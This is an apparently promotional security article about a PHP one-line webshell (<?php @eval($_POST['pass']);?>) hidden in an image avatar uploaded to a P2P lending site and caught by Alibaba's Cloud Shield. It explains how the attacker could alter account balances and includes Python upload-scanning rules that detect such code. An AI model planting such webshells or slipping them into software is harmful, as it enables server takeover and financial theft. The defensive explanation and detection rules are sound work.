An expert in the security community once said that an attack is a kind of "magic." Interestingly, on a P2P online lending platform, I really did see money "conjured" out of thin air.
P2P loans are currently a convenient and practical means of financing with which many small and medium-sized borrowers meet urgent needs. In the common P2P model, a middleman provides a matchmaking platform: on one side are people with money who hope to earn a return by lending it, on the other side are people who need loans, and the two sides complete the loan transaction through the middleman. The middleman confirms the background of both parties on the one hand and ensures the safety of the lending business on the other. Online P2P lending relies on the network, that is, on a P2P online trading platform.
Obviously, security is very important in the P2P loan business because it involves money: the lender needs to confirm that the borrower is trustworthy and reliable, and the borrower needs to be sure that the whole lending process is safe and that the funds they need will actually arrive. It is therefore crucial that the P2P platform, as the trading intermediary, can guarantee the security of the transaction.
When it comes to the security of P2P loans, the public's attention immediately focuses on the safety of the two parties to the transaction. Whether the loan can be completed safely is everyone's foremost concern. However, protecting the interests of the key intermediary in the P2P service, the trading platform, is often overlooked. This is especially true for an online lending platform.
How could a trading platform's interests be harmed? As long as there is no fraud, surely it is only a matter of earning a little more or a little less in fees! For a P2P lending platform in a normal online trading environment, that is indeed the case. However, online lending platforms have a special property: the Internet itself makes the trading environment more complicated and more exposed to outside factors.
On the Internet, P2P lending differs from the traditional offline business: a fourth party is likely to appear besides the two sides of the transaction and the intermediary platform, namely an attacker. The attacker arrives uninvited, and his pursuit of profit is often more intense and unscrupulous than that of the other three parties in the P2P lending business.
The story begins. Looking at P2P online lending from the attacker's point of view, the parties to a transaction are certainly good targets; an experienced hacker, however, is likely to choose the middleman, the P2P platform. As we all know, the ultimate goal of P2P lending is a win-win outcome. Once an attacker joins in, things are completely different: if the attacker profits, the interests of one or more of the legitimate parties to the P2P service are inevitably compromised.
Service interruption and user information leakage are probably the business threats that come to mind first. A website is hit by DDoS, a user database is dumped; such incidents are often seen in the news. However, a P2P lending platform is an Internet financial platform. Put more plainly, it deals in money. Once a hacker chooses a P2P lending platform as a target, the goal is often no longer simply denial of service or theft of user information, but the money on the platform.
The story starts to get interesting. The security community has a famous saying: the bad guy goes where the money is. When it comes to money on a P2P platform, the money in the accounts of both parties is undoubtedly the biggest target.
That's right, the money in the account. The money in an account is a temptation, a mountain of gold.
Here is a question: where does the money in an account come from? This seemingly stupid question may draw a laugh: from transactions, of course, or else it was deposited. It can't be conjured up, can it?
An expert in the security community once said that an attack is a kind of "magic." What if the attacker is a "magician"? Then why couldn't the money in an account be conjured up?
Interestingly, on a P2P online lending platform, I really did see money "conjured" out of thin air. What follows may be a bit dry, but I will try to explain it in plain language.
If I told you that the pile of garbled text above is actually a picture, would you hit me? It really is a picture, though; all that garbled text is the encoded image data. The picture is an avatar that a "magician" uploaded to an online lending platform.
Did you see the short text at the top? <?php @eval($_POST['pass']);?> Readers with some grounding in attack and defense will smile knowingly: isn't this a Trojan? That's right, a one-line Trojan.
Here is a quick primer on what a Trojan is. Trojans are also called backdoors, and are also known as Webshells. "Web" refers to a web server that exposes web services. "Shell" refers to gaining some level of operational access to the server. A Webshell usually means that an attacker has gained some degree of operational access to a web server through a port. Webshells are mostly dynamic script files and are also called website backdoor tools.
What we see above is a PHP Trojan, or more precisely a PHP one-line image Trojan. What is it for? In short, once such a Trojan is uploaded to a web server by an attacker, it can help the hacker gain control of the web server. If the hacker uses it to read the database connection file, then your database is his.
The story now reaches its climax. The database is lost, so user information is leaked? Please. On a P2P lending site, would someone go to so much effort (in fact, it does not take much effort) just for user information? Of course not. He can freely modify the balance of his own account: 100, 1,000, 10,000, 100,000... and then transfer it or withdraw cash.
Now witness the moment of the "miracle": the attacker conjures money out of thin air, and the owner of the lending website ends up paying for this "miracle." At the beginning of this article, we mentioned that because of the special nature of the Internet environment, the middleman that runs an online lending platform may suffer losses from cyber attacks. The story above is a true portrayal of that.
Some readers will ask: is this just a story of yours? It really is not. The picture above is a real Trojan that Aliyun intercepted on an online lending website not long ago. The attacker thought he could bypass Aliyun's protection the way he would a traditional protection system and uploaded the Trojan, but it was unexpectedly discovered by the Cloud Shield server protection engine, which immediately raised an alert. That is how we obtained the Trojan. After that, we quickly notified the site's manager through the customer service system and provided a solution.
From the attack point of view, the attacker's biggest "highlight" in this attack is that the Trojan was "turned into" a picture. The purpose of doing so is to bypass protection. Traditional protection usually filters and checks script code, while the contents of an uploaded image are hard to verify, so the filter often decides whether a file is a picture only by its file header. If the file header says it is a picture, the file is let through by default. What the attacker did not expect was that Cloud Shield's server-level protection engine, using script protection rules, would accurately find and locate the Trojan.
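The gap between a header-only filter and a content rule can be shown in a few lines. This is an added example, not Cloud Shield's engine or code from the original article; the rule names, function names and sample bytes are constructed for illustration, and the tainted sample carries a harmless PHP tag.

```python
import re

# Magic numbers that a header-only upload filter typically trusts.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Hypothetical script rules: markers that should never occur inside image bytes.
SCRIPT_RULES = [
    ("php-open-tag", re.compile(rb"<\?php\b", re.I)),
    ("php-script-tag",
     re.compile(rb"<script[^>]*language\s*=\s*[\"']?php", re.I)),
    ("eval-of-request-input",
     re.compile(rb"\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)),
]

def header_only_check(data: bytes):
    """The weak filter described above: trust the file header alone."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def scan_upload(data: bytes):
    """Header check plus content rules. Returns (accepted, findings)."""
    if header_only_check(data) is None:
        return False, ["not-an-image"]
    findings = [name for name, rule in SCRIPT_RULES if rule.search(data)]
    return (not findings), findings

# Constructed samples: a minimal 1x1 GIF, and a GIF header followed by
# a benign PHP tag standing in for the embedded script.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
             b"\x00\x02\x02D\x01\x00;")
TAINTED_GIF = b"GIF89a\x01\x00\x01\x00" + b"<?php echo 'constructed-marker'; ?>"

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_GIF), ("tainted", TAINTED_GIF)):
        print(label, header_only_check(blob), scan_upload(blob))
```

Pattern rules like these can be evaded by obfuscation, so they work best alongside re-encoding uploaded images and serving uploads from a location where scripts are never executed.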
The "magician" schemed with all his cunning, but in the end the Trojan failed to escape YunDun's grasp. The interests of the P2P lending website's owner were protected.
The story of the "Magician and the Trojan" comes to an end here. However, the offensive and defensive war between attackers and defenders around Internet finance has only just begun. P2P lending and Internet finance are developing rapidly, and throughout that development the contest between attackers and website defenders will continue. Ali Cloud Shield will also continue to face attackers' challenges. This shield, a decade in the making, will grow sturdier and stronger through the ongoing offensive and defensive battles.